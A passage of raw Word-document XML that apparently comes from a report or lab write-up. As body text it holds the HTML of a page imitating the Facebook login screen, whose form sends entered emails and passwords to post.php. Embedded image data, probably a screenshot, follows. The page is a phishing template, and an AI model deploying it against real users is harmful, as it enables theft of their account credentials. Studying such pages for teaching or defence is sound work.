      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D077A1" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A3567" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F890E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>logo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9D9B7" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>class="logo"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>facebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13123672" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF7BA5" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>class="login-form"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F746AE" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="962"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h2&gt;Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Facebook&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615F3D9A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="962"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>post.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB2639" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1161"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for="email"&gt;Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Phone:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586140E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1161"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>name="email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>id="email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC0B2A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1161"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>for="password"&gt;Password:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70053F4B" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="1161"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>name="password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>id="password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145A15D0" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="962"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="submit"&gt;Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>In&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F037FE3" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="962"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E1191" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Footer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204A2F1" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>class="footer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBEB63" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="962"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p&gt;Don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>account?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="#"&gt;Sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Facebook&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B22E21" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A05073" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B28EA" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D6A61" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487589888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07DD84BC" wp14:editId="5839D951">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154974</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2372360" cy="265430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2360" cy="2654300"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2372360" cy="2654300"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="14" name="Image 14"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9461"/>
                            <a:ext cx="2353310" cy="2629238"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="15" name="Graphic 15"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="2362835" cy="2644775"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2362835" h="2644775">
                                <a:moveTo>
                                  <a:pt x="0" y="2644393"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2362835" y="2644393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2362835" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="264439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D678A43" id="Group 13" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.75pt;margin-top:12.2pt;width:186.8pt;height:209pt;z-index:-15726592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="23723,265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jC+VxAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbW/TMBD+jsR/&#10;sPKdpU3abovWIcRgmoRggiE+u46TWDi2sd2X/XvubCcNK2hApabn+Hx+/Nxz5169PvSS7Lh1Qqt1&#10;Nj+bZYQrpmuh2nX29eH9q4uMOE9VTaVWfJ09cpe9vn754mpvKl7oTsuaWwJBlKv2Zp113psqzx3r&#10;eE/dmTZcwWSjbU89DG2b15buIXov82I2W+V7bWtjNePOwdubOJldh/hNw5n/1DSOeyLXGWDz4WnD&#10;c4PP/PqKVq2lphMswaD/gaKnQsGmY6gb6inZWnESqhfMaqcbf8Z0n+umEYyHM8Bp5rMnp7m1emvC&#10;Wdpq35qRJqD2CU//HZZ93N1a88Xc24gezA+afXfAS743bTWdx3F7dD40tsdFcAhyCIw+jozygycM&#10;XhbleVGugHgGc8VquShniXPWQWJO1rHu3TMrc1rFjQO8EY4RrIJvogisE4qelxKs8lvLsxSk/6sY&#10;PbXft+YVZNNQLzZCCv8YlAl5Q1Bqdy8YsosDYPPeElFDpSwyomgPFXHX05YTGAPlgw+uwAycBNhI&#10;Yd4LKZF3tBNUEPQTQfzmtFFsN5pte658rB7LJaDWynXCuIzYivcbDvDsXT2HpEHleoBorFA+lorz&#10;lnvW4f4N4PgMBYZAaTVOBNBHnHgEl+T1RDGXy2KZERDG5WI1j+GPulmW5XzUTXFZlBfoMWafVsY6&#10;f8t1T9AAxIAEKKcV3X1wCdPgkpiMMAI+QIUtAnqOGziE0QmL/1RWXzpqOEDAsJNEwxFjom9Tl5kv&#10;8STJCysvjf7A0uJ8VQSWggG+tDqytCouStggVtdicX4eYk9YYtvI0pQZ6FJ15AjY6gaLHdRgIpfY&#10;MGVomB50AfxmBBrmJqYJpI7rMCiaZI+VnrB0WOgRCs73escfdPD0x3JHj/KyTCk9+kg19R1jhuYx&#10;XTH4Db8mxJ76hzYDRAwew2/0BGUNzeoZn1+RDlGY1I5DLmAxEjAagRR4OaVdKuQniB1pcFqKeqhh&#10;Z9vNW2nJjuL9FD6Jk1/cUMg31HXRL0wlN6lgb9RSVA9aG10/QpfZg9zWmfuxpdjS5J0CeeMNOBh2&#10;MDaDYb18q8M9GdIFez4cvlFrUoV5kN1HPaj8pNCiL65U+s3W60aEKjwiSkCh4oIVrrRAXLp+8c6c&#10;joPX8U/C9U8AAAD//wMAUEsDBAoAAAAAAAAAIQCMhcEzKEcAAChHAAAVAAAAZHJzL21lZGlhL2lt&#10;YWdlMS5qcGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoH&#10;BwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkU&#10;DQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAAR&#10;CAHTAa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&#10;RRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR